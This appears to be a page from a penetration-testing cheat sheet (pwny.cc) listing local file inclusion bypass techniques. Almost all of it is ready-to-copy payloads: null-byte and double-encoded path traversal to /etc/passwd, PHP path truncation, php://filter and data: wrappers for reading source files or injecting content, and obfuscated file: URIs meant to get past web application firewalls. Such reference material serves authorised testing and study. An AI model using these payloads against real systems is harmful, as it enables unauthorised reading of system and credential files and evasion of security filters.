pwny.cc
Search…
Bypass Techniques

General

1
#Null byte (%00)
2
http://web.com/index.php?page=../../../etc/passwd%00
3
4
#URL encoding
5
http://web.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
6
http://web.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
7
http://web.com/index.php?page=%252e%252e%252fetc%252fpasswd
8
http://web.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
9
10
#Path Truncation
11
##In PHP: /etc/passwd = /etc//passwd = /etc/./passwd = /etc/passwd/ = /etc/passwd/.
12
Check if last 6 chars are passwd --> passwd/
13
Check if last 4 chars are ".php" --> shellcode.php/.
Copied!

PHP Wrappers

1
#Base64
2
http://web.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
3
4
#Zlib (compression)
5
http://web.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
6
#To read it, execute this in your php console
7
readfile('php://filter/zlib.inflate/resource=test.deflated');
8
9
#Data - #Bypass Chrome Auditor
10
http://web.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
Copied!

WAF Bypass

1
file:/etc/passwd?/
2
file:/etc/passwd%3F/
3
file:/etc%252Fpasswd/
4
file:/etc%252Fpasswd%3F/
5
file:///etc/?/../passwd
6
file:///etc/%3F/../passwd
7
file:${br}/et${u}c/pas${te}swd?/
8
file:$(br)/et$(u)c/pas$(te)swd?/
Copied!